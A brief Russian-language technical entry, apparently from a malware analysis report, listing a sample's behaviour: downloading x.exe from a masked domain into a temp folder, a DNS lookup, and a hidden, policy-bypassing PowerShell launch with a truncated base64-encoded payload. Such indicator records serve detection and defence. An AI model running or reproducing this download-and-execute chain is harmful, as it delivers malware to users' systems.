Техническая информация
- http://jh##l.com/x.exe как %temp%\qwere\xeo.exe
- DNS ASK jh##l.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -nop -wind hidden -Exec Bypass -noni -enc TgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AHQAZQBtAHAAXAAgAC0ATgBhAG0AZQAgACIAcQB3AGUAcgBlACIAIAAtAEkAdABlAG0AVAB5AHAAZQAgA...